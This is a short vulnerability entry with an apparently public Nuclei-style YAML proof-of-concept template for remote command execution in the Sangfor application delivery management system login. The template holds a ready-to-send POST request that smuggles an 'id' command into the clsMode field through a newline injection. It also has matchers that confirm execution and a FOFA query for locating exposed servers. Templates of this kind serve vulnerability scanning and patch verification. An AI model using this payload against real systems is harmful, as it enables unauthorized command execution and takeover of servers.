漏洞描述
Sangfor application delivery management system login has a remote command execution vulnerability, through which an attacker can obtain server privileges and execute arbitrary commands
sangfor-login-rce: Sangfor Application Login - Remote Command Execution
PoC代码[已公开]
id: sangfor-login-rce
info:
name: Sangfor Application Login - Remote Command Execution
author: SleepingBag945
severity: critical
description: |
Sangfor application delivery management system login has a remote command execution vulnerability, through which an attacker can obtain server privileges and execute arbitrary commands
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml
metadata:
verified: true
max-request: 1
fofa-query: fid="iaytNA57019/kADk8Nev7g=="
tags: sangfor,rce,vuln
http:
- raw:
- |
POST /rep/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
matchers:
- type: dsl
dsl:
- status_code == 200
- regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)", body)
- contains(body, "cluster_mode_others")
condition: and
# digest: 4a0a00473045022100aaa336e5a0256947d273487d84028e98a558060a787906427d29010c3117e621022038443a491101f6b99eb53fc93fbffb04d7b869e85d1be44e92f336df0f4ac435:922c64590222798bb761d5b6d8e72950